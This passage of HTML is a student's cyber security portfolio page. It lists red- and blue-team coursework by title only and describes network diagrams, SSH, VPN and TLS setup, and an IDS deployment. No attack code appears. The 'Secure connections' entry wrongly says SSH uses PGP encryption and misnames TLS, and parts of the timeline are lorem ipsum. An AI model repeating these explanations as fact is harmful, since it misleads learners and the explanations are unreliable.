          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
